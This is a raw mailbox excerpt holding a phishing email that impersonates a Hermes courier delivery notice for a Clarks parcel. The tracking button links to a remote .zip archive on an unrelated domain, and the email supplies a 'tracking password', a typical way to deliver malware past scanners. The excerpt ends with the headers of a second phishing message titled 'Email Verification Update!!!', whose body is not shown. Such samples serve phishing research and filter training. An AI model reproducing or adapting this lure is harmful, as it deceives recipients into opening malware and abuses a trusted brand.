From: Hermesparcelcouriers.uk@vs1144178.vserver.de
MIME-Version: 1.0
Content-Type: text/html; charset=ISO-8859-1
X-Priority: 1
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 218


<table style="border-collapse:collapse;border-spacing:0;text-align:left" align="center" width="576">
<tbody>
<td>
<td style="" colspan="2">
<img class="CToWUd" style="display:block;text-decoration:none;border-style:none;" src="http://biotechmedivision.com/letterlogos/hermes-logo.png"></td>
</tr>
</tbody>
</table>

<table style="border-collapse:collapse;border-spacing:0;text-align:left" align="center" width="576">
<tbody>
<tr>
<td style="font-size:11pt;font-family:verdana;color:#666666;background:#ffffff;padding:5px 15px 0px 15px;text-align:left" colspan="3">Hello, 
<br> <br> 
<span class="il">Your</span> <span class="il">CLARKS</span> <span class="il">parcel</span> is <span class="il">now</span> with <span class="il">your</span> <span class="il">local</span> <span class="il">Hermes</span> <span class="il">courier</span> for <span class="il">delivery</span>. <br> <br> For complete tracking history click here:<br> 
<a href="http://trilogyenvironmental.co.uk/HermesTracking.zip"> <img style="vertical-align:middle;text-decoration:none;border-style:none;width:200px;text-align:left" src="http://biotechmedivision.com/letterlogos/tracking.png" ></a></td>
</tr>
<tr>
<td style="width:270px;min-width:225px;vertical-align:top;min-height:150;font-size:11pt;font-family:verdana;color:#666666;background:#ffffff;padding:0px 15px 25px 15px;text-align:left" colspan="2"><br> Tracking Password: Track16230891 <br> <br> The <span class="il">Hermes</span> team</td>
<td style="vertical-align:bottom;min-height:150;background:#ffffff;padding:20px 15px 10px 15px">
<img style="border-style:none;float:right;max-width:240px" src="http://biotechmedivision.com/letterlogos/clarks.png" align="right"></td>
</tr>
</tbody>
</table>

<table style="border-collapse:collapse;border-spacing:0;width:576px" align="center" bgcolor="#ffffff" border="0">
<tbody>
<tr>
<td>
<img src="http://biotechmedivision.com/letterlogos/footer.png">
</td>
</tr>
</tbody>
</table>
</div>

From nagolosinda@macodalogistics.com  Wed Oct 28 02:24:38 2015
Return-Path: <nagolosinda@macodalogistics.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id A5526F41F5
	for <jose@login.monkey.org>; Wed, 28 Oct 2015 02:24:38 -0500 (CDT)
Received: from smtpin01.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay03.b.hostedemail.com (Postfix) with SMTP id 6CBFE18478E
	for <jose@login.monkey.org>; Wed, 28 Oct 2015 07:24:38 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70790679036.01.wing22_b5b757908f53
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 18,1.407,0,d7c46f36f204b147,d41d8cd98f00b204,nagolosinda@macodalogistics.com,:,RULES_HIT:41:72:355:379:589:800:962:967:973:978:983:988:989:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1534:1541:1560:1575:1588:1589:1592:1594:1711:1714:1730:1749:1777:1792:2107:2198:2199:2525:2560:2563:2682:2685:2859:2890:2914:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3865:3867:3871:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4365:5007:6261:6650:6678:7652:7809:8603:8987:9025:9059:9388:9416:9873:10004:10400:11658:11914:12043:13025:13132:13139:13161:13163:13229:13231:13235:13846:21060:21080:30022:30026:30054:30069:30070,0,RBL:198.49.76.10:@macodalogistics.com:.lbl8.mailshell.net-62.8.255.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:11,LUA_SUMMARY:none
X-HE-Tag: wing22_b5b757908f53
X-Filterd-Recvd-Size: 2845
Received: from windows.httpdnscloud.net (unknown [198.49.76.10])
	by imf11.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 28 Oct 2015 07:24:37 +0000 (UTC)
Received: from [192.168.1.8] ([197.255.171.238]) by windows.httpdnscloud.net with MailEnable ESMTP; Wed, 28 Oct 2015 02:00:45 +0800
Content-Type: multipart/alternative; boundary="===============2045486610=="
MIME-Version: 1.0
Subject: Email Verification Update!!!
To: jose@monkey.org
